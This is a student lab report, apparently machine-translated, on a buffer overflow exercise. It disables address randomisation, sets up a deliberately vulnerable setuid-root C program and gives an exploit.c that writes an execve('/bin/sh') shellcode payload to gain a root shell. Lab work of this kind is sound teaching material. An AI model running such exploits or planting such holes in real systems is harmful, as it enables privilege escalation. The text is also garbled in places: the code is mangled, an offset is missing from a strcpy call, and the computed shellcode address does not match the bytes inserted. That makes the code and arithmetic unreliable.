20165232 Buffer Overflow Vulnerability experiment

Experimental preparation of Buffer Overflow Vulnerability experiment

The lab environment requires a 32-bit Linux system and needs to download and install some packages for compiling 32-bit C programs, as follows:

$ sudo apt-get update$ sudo apt-get install -y lib32z1 libc6-dev-i386$ sudo apt-get install -y lib32readline-gplv2-dev

Initial setup of experimental content

1. Using commands

$ sudo sysctl -w kernel.randomize_va_space=0

To turn off address space randomization.

2. Replace/bin/bash with another shell program (ZSH), with the following code:

$ sudo su$ cd /bin$ rm sh$ ln -s zsh sh$ exit

3. Enter/bin/bash

Shellcode

In general, a buffer overflow can cause a program to crash, and in the program, the overflow data overwrites the return address. And if the data that overwrites the return address is another address, then the program jumps to that address, and if the address is a piece of well-designed code to implement other functions, this code is shellcode.

Vulnerability procedures

1. Create a new STACK.C file in the/tmp directory:

$ cd /tmp$ vi stack.c

The code is as follows:

/* stack.c *//* This program has a buffer overflow vulnerability. *//* Our task is to exploit this vulnerability */#include <stdlib.h>#include <stdio.h>#include <string.h>int bof(char *str){    char buffer[12];    /* The following statement has a buffer overflow problem */     strcpy(buffer, str);    return 1;}int main(int argc, char **argv){    char str[517];    FILE *badfile;    badfile = fopen("badfile", "r");    fread(str, sizeof(char), 517, badfile);    bof(str);    printf("Returned Properly\n");    return 1;}

2. Compile the program and set the Set-uid. The command is as follows:

$ sudo su$ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c$ chmod u+s stack$ exit

Attack program

1. Create a new exploit.c file in the/tmp directory with the following code:

/* EXPLOIT.C *//* A program this creates a file containing code for launching shell*/#include <stdlib.h> #include &lt ;stdio.h> #include <string.h>char shellcode[] = "\x31\xc0"//xorl%eax,%eax "\x50"//PUSHL%eax "\x68 "//sh"//PUSHL $0x68732f2f "\x68" "/bin"//PUSHL $0x6e69622f "\x89\xe3"//movl%esp,%ebx "\x50"//PUSHL% EAX "\x53"//PUSHL%ebx "\x89\xe1"//movl%esp,%ecx "\x99"//CDQ "\xb0\x0b"//movb $0x0b,%al "\xcd\    x80 "//int $0x80; void Main (int argc, char **argv) {char buffer[517];    FILE *badfile;    /* Initialize buffer with 0x90 (NOP instruction) */memset (&buffer, 0x90, 517); /* need to fill the buffer with appropriate contents here */strcpy (buffer, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x?? \x?? \x??   \x?? ");   Four bytes starting at a specific offset of buffer overwrite Sellcode address strcpy (buffer + shellcode); Copy shellcode to buffer with offset set to/* Save the CONtents to the file "badfile" */Badfile = fopen ("./badfile", "w");    fwrite (buffer, 517, 1, badfile); Fclose (badfile);}

2. To get the Shellcode address in memory, enter the command:

$ gdb stack$ disass main

3. According to the statement strcpy (buffer + 100,shellcode); We calculate Shellcode's address as 0xffffd420 (hex) + 0x64 (hex of 100) = 0xffffd484 (hex)

Modify EXPLOIT.C file Now! Will \x?? \x?? \x?? \x?? Modify to \xc4\xd0\xff\xff

Then, compile the EXPLOIT.C program:

$ gcc -m32 -o exploit exploit.c

Attack results

Job Title

by command

sudo sysctl -w kernel.randomize_va_space=2

Open the system's address space randomization mechanism, repeatedly using the exploit program to attack the stack program, to see if the attack succeeds, can gain root privileges.

20165232 Buffer Overflow Vulnerability experiment